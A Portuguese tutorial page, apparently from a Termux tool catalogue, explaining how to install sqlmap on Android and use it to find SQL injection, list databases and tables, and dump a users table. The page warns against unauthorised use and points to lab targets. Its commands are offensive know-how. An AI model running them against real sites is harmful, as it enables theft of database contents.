
Sqlmap
Ferramenta open-source para automatizar a detecção e exploração de falhas de SQL injection, com suporte a dezenas de SGBDs.
SQL Injection é uma falha onde um site permite que você 'injete' comandos no banco de dados através de campos do site. O sqlmap automatiza todo o trabalho: testa o site, descobre a falha, extrai dados, lista tabelas, e em alguns casos até dá acesso ao sistema. É a ferramenta nº1 para essa categoria de vulnerabilidade.
repositório oficial ↗Antes de instalar
Atualize os repositórios e libere o armazenamento do Termux:
$ pkg update && pkg upgrade -y$ termux-setup-storageInstalação
$ pkg install python -y$ pip install sqlmapExemplo de uso
$ sqlmap -u 'https://alvo.com/item.php?id=1' --dbsPasso a passo
- 1
Instale o Python.
$ pkg install python -y - 2
Instale o sqlmap.
$ pip install sqlmap - 3
Teste uma URL com parâmetro suspeito.
$ sqlmap -u 'https://alvo.com/item.php?id=1' - 4
Se for vulnerável, liste os bancos de dados.
$ sqlmap -u 'https://alvo.com/item.php?id=1' --dbs - 5
Liste as tabelas de um banco específico.
$ sqlmap -u 'https://alvo.com/item.php?id=1' -D nome_db --tables - 6
Extraia dados (dump) de uma tabela.
$ sqlmap -u 'https://alvo.com/item.php?id=1' -D nome_db -T usuarios --dump
Dicas
- ›Use apenas em alvos próprios ou autorizados. SQLi sem autorização é crime.
Prática segura · Sqlmap
→ guia do labSuba o alvo em Docker/VM antes de apontar Sqlmap. Nunca rode contra IP/domínio que não seja seu ou autorizado.
alvo sugerido · DVWA local (docker), Juice Shop, testphp.vulnweb.com ou PortSwigger Academy
Nunca aponte para alvo em produção. Se estiver no celular, use proot-distro + Debian para não sujar o Termux principal.
